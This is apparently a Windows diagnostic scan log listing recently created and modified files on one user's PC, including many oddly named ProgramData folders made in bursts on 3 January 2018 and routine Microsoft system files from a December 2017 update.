2018-01-03 22:40 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-65a7-0
2018-01-03 22:40 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-5cc7-0
2018-01-03 22:40 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-5b33-0
2018-01-03 22:40 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-2f53-1
2018-01-03 22:40 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-2d01-1
2018-01-03 22:40 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-2cc1-1
2018-01-03 22:40 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\{DBE344D9-6C48-F372-C5F9-E05B886F47F5}
2018-01-03 22:40 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\{463EBE16-F195-09BD-9412-C3C85CB9EFED}
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-3747-0
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-24b5-1
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-11b1-0
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-0ce7-0
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-0bf3-0
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\{F10C4B4B-46A7-FCE0-FB56-A345FC7B572B}
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\{EDE4CCD0-5A4F-7B7B-D6A1-C2B27715C46B}
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\{E7980793-5033-B038-2E29-629BA06B25DB}
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\{E2923DE2-5539-8A49-5DAD-3CF7411D6B59}
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\{807EEE8C-37D5-5927-3C15-70A024DE2A67}
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\{7A1DE5BC-CDB6-5217-C240-3876A2703B35}
2018-01-03 22:40 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\{452EFFE0-F285-484B-40A5-4E19633255C0}
2018-01-03 22:39 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\d7031301-0285-1
2018-01-03 22:39 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-7d31-1
2018-01-03 22:39 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-7e73-0
2018-01-03 22:39 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-6d81-1
2018-01-03 22:39 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-67b3-0
2018-01-03 22:39 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-5e67-0
2018-01-03 22:39 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-59a3-1
2018-01-03 22:39 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-4d53-1
2018-01-03 22:39 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-2aa7-0
2018-01-03 22:39 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\d7031301-2685-0
2018-01-03 22:39 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\{D5FED01A-6255-67B1-F77D-9511A8F1492C}
2018-01-03 22:39 - 2018-01-03 22:40 - 000000000 ____D C:\ProgramData\{2804F728-9FAF-4083-ED08-6EAA2CC950FC}
2018-01-03 22:39 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{F4ADA2D7-4306-157C-A13C-0E1355F57C2C}
2018-01-03 22:39 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{E8C849D9-5F63-FE72-6F1F-A4D7AE7A4D2C}
2018-01-03 22:39 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{E0886965-5723-DECE-4A5C-C054A56BE7FC}
2018-01-03 22:39 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{C195454F-763E-F2E4-EB83-881CD1A264B0}
2018-01-03 22:39 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{586368EB-EFC8-DF40-E7FC-9D6B7EF363ED}
2018-01-03 22:39 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{4AF24D8C-FD59-FA27-3247-EE226C68CA36}
2018-01-03 22:39 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{3C32A0BA-8B99-1711-5FA4-844742A035B3}
2018-01-03 22:39 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{28CED4D0-9F65-637B-43EE-214F6383A680}
2018-01-03 22:39 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{1AF0B771-AD5B-00DA-5B29-D5FDA6A1A16E}
2018-01-03 22:39 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{1254521B-A5FF-E5B0-2F7B-4E52C095B415}
2018-01-03 22:38 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\d7031301-0915-0
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\d7031301-76f7-1
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\d7031301-6ee7-0
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\d7031301-68e3-0
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\d7031301-5a65-1
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\d7031301-5791-0
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\d7031301-2f25-1
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\d7031301-2603-0
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\d7031301-23e3-0
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\d7031301-10d7-1
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\d7031301-07f5-1
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\d7031301-0355-1
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{EAEFBF84-5D44-082F-7840-E6F54C36056C}
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{5EE0E25F-E94B-55F4-581D-FE9745C54290}
2018-01-03 22:38 - 2018-01-03 22:39 - 000000000 ____D C:\ProgramData\{46D3EA64-F178-5DCF-470C-D83A0A334B7B}
2018-01-03 22:38 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\{C6F6A6B7-715D-111C-FF5C-8DA5EF40CDEF}
2018-01-03 22:38 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\{7AF78266-CD5C-35CD-BBA6-0C699B2D2858}
2018-01-03 22:38 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\{73D7CAC3-C47C-7D68-AE13-EB947996129F}
2018-01-03 22:38 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\{5B1B1CEF-ECB0-AB44-6AD6-203DA5FD0F95}
2018-01-03 22:38 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\{47E9C992-F042-7E39-F824-369C8F387862}
2018-01-03 22:38 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\{44E5E78E-F34E-5025-9621-21377DDC47A4}
2018-01-03 22:38 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\{161F6462-A1B4-D3C9-4B98-027A3545B75F}
2018-01-03 22:37 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\d7031301-4163-1
2018-01-03 22:37 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\d7031301-32f5-0
2018-01-03 22:31 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\{53D76B68-E47C-DCC3-9BE2-6338E84292C4}
2018-01-03 22:30 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\{C0987866-7733-CFCD-EFAF-B1B1BE3CF08A}
2018-01-03 22:30 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\{BF56015D-08FD-B6F6-39B7-933922EFE08B}
2018-01-03 22:30 - 2018-01-03 22:31 - 000000000 ____D C:\ProgramData\d7031301-4511-1
2018-01-03 22:30 - 2018-01-03 22:31 - 000000000 ____D C:\ProgramData\d7031301-2c43-0
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-6461-1
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-5653-0
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-39e5-1
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-2907-0
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-1a85-0
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-0cc7-1
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-0a55-1
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-0757-0
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-0091-0
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\{D08CAFAA-6727-1801-9ED6-31F8FE972B7E}
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\{CABB917C-7D10-26D7-B611-1ED69F9EA151}
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\{BAA2AAAB-0D09-1D00-519E-42B25BCD1740}
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\{A29A7F7C-1531-C8D7-DFF9-CBE38112A727}
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\{7A0DBE1A-CDA6-09B1-017F-48B6CF60B796}
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\{61DE97DC-D675-2077-9015-BBBBBAF69409}
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\{48387B47-FF93-CCEC-021D-173EC4C9A8F4}
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\{28106F0C-9FBB-D8A7-A074-DEB1EB11996A}
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\{0DB1BFFA-BA1A-0851-695E-E6A8EBBFE36B}
2018-01-03 22:30 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\{06A4E7B1-B10F-501A-5E19-E0E07300FF7E}
2018-01-03 22:29 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-6635-0
2018-01-03 22:29 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-3e27-0
2018-01-03 22:29 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-39d3-1
2018-01-03 22:29 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-3865-0
2018-01-03 22:29 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-36b1-1
2018-01-03 22:29 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-29f7-0
2018-01-03 22:29 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-29b5-1
2018-01-03 22:29 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-13f1-1
2018-01-03 22:29 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\{4D35A01A-FA9E-17B1-19F7-030854CB6D0F}
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\d7031301-7d33-0
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{E724489B-508F-FF30-B850-373B63BE1330}
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{DCD141DD-6B7A-F676-FD3C-CAB68BCDEAF3}
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{D67BF1F3-61D0-4658-F304-FFFD8B9C580E}
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{94212606-238A-91AD-ED4E-6E00E60BF55F}
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{6ABEB12E-DD15-0685-7DF1-8CECD4B5A817}
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{4AB16832-FD1A-DF99-7169-9CBB38188FEC}
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{4A83CCB2-FD28-7B19-F281-5AD58D56FEF6}
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{3AB9C7CA-8D12-7061-ED92-6EA7FCE76423}
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{2B6795A0-9CCC-220B-D9FE-4049C2768D7E}
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{21763881-96DD-8F2A-38DC-E59A2B9EF9CB}
2018-01-03 22:29 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{085906CE-BFF2-B165-9210-D294D5E1FFB7}
2018-01-03 22:28 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\d7031301-6953-0
2018-01-03 22:28 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\d7031301-3873-0
2018-01-03 22:28 - 2018-01-03 22:38 - 000000000 ____D C:\ProgramData\d7031301-2c25-1
2018-01-03 22:28 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-7487-1
2018-01-03 22:28 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-60c5-0
2018-01-03 22:28 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-4dc1-1
2018-01-03 22:28 - 2018-01-03 22:30 - 000000000 ____D C:\ProgramData\d7031301-3c05-0
2018-01-03 22:28 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\d7031301-7ff1-1
2018-01-03 22:28 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\d7031301-6a03-1
2018-01-03 22:28 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\d7031301-3221-1
2018-01-03 22:28 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\d7031301-2ef3-0
2018-01-03 22:28 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\d7031301-1347-0
2018-01-03 22:28 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{492302C9-FE88-B562-2B02-6F5A5D3A0F5E}
2018-01-03 22:28 - 2018-01-03 22:29 - 000000000 ____D C:\ProgramData\{42CF4425-F564-F38E-6E36-4E2EABA12F00}
2018-01-03 22:28 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\{E9BF1BC6-5E14-AC6D-8257-C61795FCC9AA}
2018-01-03 22:28 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\{D7464806-60ED-FFAD-CFC0-E06D3A3CABDA}
2018-01-03 22:28 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\{B2F224D0-0559-937B-DFA4-36DA25EB6D59}
2018-01-03 22:28 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\{4D762FDB-FADD-9870-A36F-C876963767B7}
2018-01-03 22:28 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\{433183B3-F49A-3418-DDE0-608723857CAB}
2018-01-03 22:28 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\{3850460D-8FFB-F1A6-8846-76F5023F0384}
2018-01-03 22:28 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\{2AA579E9-9D0E-CE42-8143-B3C2F059A5E7}
2018-01-03 22:27 - 2018-01-03 22:52 - 000000000 ____D C:\ProgramData\d7031301-6ed7-1
2018-01-03 22:27 - 2018-01-03 22:52 - 000000000 ____D C:\ProgramData\d7031301-07f5-0
2018-01-03 22:27 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\d7031301-52d7-1
2018-01-03 22:27 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\d7031301-3123-0
2018-01-03 22:27 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\d7031301-2e61-0
2018-01-03 22:27 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\d7031301-2a27-1
2018-01-03 22:27 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\d7031301-1f51-1
2018-01-03 22:27 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\d7031301-09b1-0
2018-01-03 22:27 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\d7031301-0077-1
2018-01-03 22:27 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\{99A90628-2E02-B183-8310-DF458D3394A8}
2018-01-03 22:27 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\{379E3EE4-8035-894F-FDB8-3C8A801A3AFF}
2018-01-03 22:27 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\d7031301-7d61-0
2018-01-03 22:27 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\d7031301-07c5-0
2018-01-03 22:27 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\{FE6B2EA9-49C0-9902-CB94-54C6E51DB87C}
2018-01-03 22:27 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\{49776C5D-FEDC-DBF6-EC86-1726FC04077D}
2018-01-03 22:27 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\{3E253FE9-898E-8842-78C2-D8027E7EC119}
2018-01-03 22:27 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\{18977854-612c-0}
2018-01-03 22:27 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\{0FE3A631-B848-119A-6D0E-AB691066E3D9}
2018-01-03 22:27 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\{0da50739-512c-0}
2018-01-03 16:47 - 2018-01-03 16:47 - 000000000 ____D C:\Users\Gaming\AppData\LocalLow\Sun
2018-01-03 16:44 - 2018-01-03 16:46 - 049298432 _____ C:\Users\Gaming\Downloads\BlackboardCollaborateLauncher-Win.msi
2017-12-30 00:03 - 2017-12-30 00:03 - 000000000 _____ C:\WINDOWS\system32\test.log.2017.12.30-00
2017-12-22 21:57 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\{C8756DB8-7FDE-DA13-C98D-52F304D69A9B}
2017-12-22 21:56 - 2018-01-03 22:28 - 000000000 ____D C:\ProgramData\{3e241582-612c-1}
2017-12-22 21:56 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\d7031301-5ca1-1
2017-12-22 21:56 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\d7031301-3035-0
2017-12-22 21:56 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\{51d1279f-712c-0}
2017-12-22 21:56 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\{38ee7dc6-712c-1}
2017-12-22 21:56 - 2018-01-03 22:27 - 000000000 ____D C:\ProgramData\{257f749d-112c-0}
2017-12-22 21:56 - 2017-12-22 21:57 - 000000000 ____D C:\ProgramData\{C17FAAA2-76D4-1D09-BA0E-64F1FE7D16EF}
2017-12-20 10:50 - 2017-12-20 10:50 - 000000000 ____D C:\Users\Gaming\AppData\LocalLow\Russian Fishing LLC
2017-12-12 23:00 - 2017-12-08 07:52 - 000666112 _____ (Microsoft Corporation) C:\WINDOWS\system32\DHolographicDisplay.dll
2017-12-12 23:00 - 2017-12-08 00:34 - 001925296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-12-12 23:00 - 2017-12-08 00:34 - 001634288 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2017-12-12 23:00 - 2017-12-08 00:34 - 000059800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bam.sys
2017-12-12 23:00 - 2017-12-08 00:31 - 008590744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-12-12 23:00 - 2017-12-08 00:31 - 000779440 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-12-12 23:00 - 2017-12-08 00:30 - 000166296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2017-12-12 23:00 - 2017-12-08 00:28 - 000710912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-12-12 23:00 - 2017-12-08 00:28 - 000630752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcrt.dll
2017-12-12 23:00 - 2017-12-08 00:27 - 004504456 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2017-12-12 23:00 - 2017-12-08 00:27 - 003903784 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-12-12 23:00 - 2017-12-08 00:27 - 000184984 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2017-12-12 23:00 - 2017-12-08 00:26 - 007385088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-12-12 23:00 - 2017-12-08 00:26 - 002709200 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-12-12 23:00 - 2017-12-08 00:26 - 000525208 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimserv.exe
2017-12-12 23:00 - 2017-12-08 00:25 - 000374032 _____ (Microsoft Corporation) C:\WINDOWS\system32\vac.exe
2017-12-12 23:00 - 2017-12-08 00:24 - 000705944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimgapi.dll
2017-12-12 23:00 - 2017-12-08 00:24 - 000437144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-12-12 23:00 - 2017-12-08 00:24 - 000246168 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-12-12 23:00 - 2017-12-08 00:23 - 005905752 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-12-12 23:00 - 2017-12-08 00:23 - 000677272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-12-12 23:00 - 2017-12-08 00:22 - 001003104 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2017-12-12 23:00 - 2017-12-08 00:22 - 000979352 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-12-12 23:00 - 2017-12-08 00:22 - 000137544 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcrypt.dll
2017-12-12 23:00 - 2017-12-08 00:22 - 000129432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvsocket.sys
2017-12-12 23:00 - 2017-12-08 00:21 - 007676296 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-12-12 23:00 - 2017-12-08 00:20 - 001170000 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-12-12 23:00 - 2017-12-08 00:19 - 021352136 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-12-12 23:00 - 2017-12-08 00:16 - 001776272 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2017-12-12 23:00 - 2017-12-08 00:16 - 000603920 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2017-12-12 23:00 - 2017-12-08 00:15 - 001426152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-12-12 23:00 - 2017-12-08 00:15 - 000721592 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2017-12-12 23:00 - 2017-12-08 00:14 - 000571288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2017-12-12 23:00 - 2017-12-08 00:12 - 000401304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volsnap.sys
2017-12-12 23:00 - 2017-12-08 00:10 - 000362904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2017-12-12 23:00 - 2017-12-07 23:58 - 000123512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2017-12-12 23:00 - 2017-12-07 23:57 - 000649304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-12-12 23:00 - 2017-12-07 23:56 - 001528904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2017-12-12 23:00 - 2017-12-07 23:55 - 001490328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-12-12 23:00 - 2017-12-07 23:55 - 000097144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcrypt.dll
2017-12-12 23:00 - 2017-12-07 23:39 - 006092664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-12-12 23:00 - 2017-12-07 23:37 - 001145104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-12-12 23:00 - 2017-12-07 23:36 - 000769096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcrt.dll
2017-12-12 23:00 - 2017-12-07 23:34 - 003484840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-12-12 23:00 - 2017-12-07 23:34 - 002192112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-12-12 23:00 - 2017-12-07 23:33 - 000747416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-12-12 23:00 - 2017-12-07 23:33 - 000592280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wimgapi.dll
2017-12-12 23:00 - 2017-12-07 23:32 - 020286120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-12-12 23:00 - 2017-12-07 23:31 - 001522176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-12-12 23:00 - 2017-12-07 23:31 - 001246432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-12-12 23:00 - 2017-12-07 23:31 - 000982016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-12-12 23:00 - 2017-12-07 23:23 - 006478528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-12-12 23:00 - 2017-12-07 23:22 - 025245696 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-12-12 23:00 - 2017-12-07 23:13 - 002905600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-12-12 23:00 - 2017-12-07 23:13 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2017-12-12 23:00 - 2017-12-07 23:12 - 000344576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2017-12-12 23:00 - 2017-12-07 23:12 - 000202240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-12-12 23:00 - 2017-12-07 23:12 - 000101376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msscript.ocx
2017-12-12 23:00 - 2017-12-07 23:11 - 003669504 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-12-12 23:00 - 2017-12-07 23:10 - 018916352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-12-12 23:00 - 2017-12-07 23:10 - 006466048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-12-12 23:00 - 2017-12-07 23:10 - 001313792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2017-12-12 23:00 - 2017-12-07 23:10 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2017-12-12 23:00 - 2017-12-07 23:10 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-12-12 23:00 - 2017-12-07 23:10 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\itss.dll
2017-12-12 23:00 - 2017-12-07 23:10 - 000106496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2017-12-12 23:00 - 2017-12-07 23:10 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2017-12-12 23:00 - 2017-12-07 23:09 - 001663488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\batmeter.dll
2017-12-12 23:00 - 2017-12-07 23:09 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll
2017-12-12 23:00 - 2017-12-07 23:09 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscript.exe
2017-12-12 23:00 - 2017-12-07 23:09 - 000143360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cscript.exe
